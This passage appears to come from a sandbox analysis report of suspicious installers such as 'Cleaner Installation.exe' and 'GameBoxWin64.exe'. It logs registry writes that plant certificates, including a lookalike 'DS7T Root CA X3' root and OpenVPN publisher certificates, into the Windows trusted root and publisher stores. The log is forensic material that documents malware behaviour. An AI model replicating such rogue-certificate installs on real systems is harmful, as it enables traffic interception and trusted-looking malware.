7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc2000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC ECvDauLMIp4oydGLLNSJGk70.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 04000000010000001000000046d5bfface94364c5dab5abfeef969060f00000001000000200000001d8788fb900790f20b92141e950c8a1eb438213e9836a97a805442a3f7b5befd0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc140000000100000014000000f556120c3053ddf82e1ca30b580aa0288a2260ad190000000100000010000000c1bb95d96de3ba0c2a983966f72224a02000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a ECvDauLMIp4oydGLLNSJGk70.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 0f00000001000000200000001d8788fb900790f20b92141e950c8a1eb438213e9836a97a805442a3f7b5befd0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc140000000100000014000000f556120c3053ddf82e1ca30b580aa0288a2260ad2000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC\Blob = 190000000100000010000000c1bb95d96de3ba0c2a983966f72224a0140000000100000014000000f556120c3053ddf82e1ca30b580aa0288a2260ad0300000001000000140000005825cd2faf4df974b7fcfa637b8fbbb1f2468acc0f00000001000000200000001d8788fb900790f20b92141e950c8a1eb438213e9836a97a805442a3f7b5befd2000000001000000300200003082022c30820195a00302010202083e4c704d3c1def02300d06092a864886f70d01010b050030403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e301e170d3139303832333138343830385a170d3233303832323138343830385a30403118301606035504030c0f4453375420526f6f7420434120583331243022060355040a0c1b4469676974616c205369676e617475726520547275737420436f2e30819f300d06092a864886f70d010101050003818d0030818902818100d5d8e59d0ae2a8280fc529c7d25c0676fb8f7872e19bbf93aeed805ff41b9b1954cd19137f90e382b774cc185fd53c7bbe5b4de81766b6f7c585c19791790a9c81fa5faacc05c57a7a63a5771465c6cd477e863cf0535cd91d28f217fec79c1c57ec8dfba4a0ecab94d267bd39258d5adf8c5cb04f1b3535fe1bd366272a1d510203010001a32f302d300f0603551d130101ff040530030101ff301a0603551d1104133011820f4453375420526f6f74204341205833300d06092a864886f70d01010b0500038181004a01e10e2f35c40ba4232dd559ae48b95ec54ada13371d592dd636856e7263fa2ab9225b85c8f8df8ff486b4c01946f6a63b0190680ac337d479270bdfc141dbeb9469442edc694d656850da4851417d92a98c4f45ce731cceaee4a6f372fc9566a395484c915060f93d7bebe1c19c59ae294815ecdc656c651d466a883d155a Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff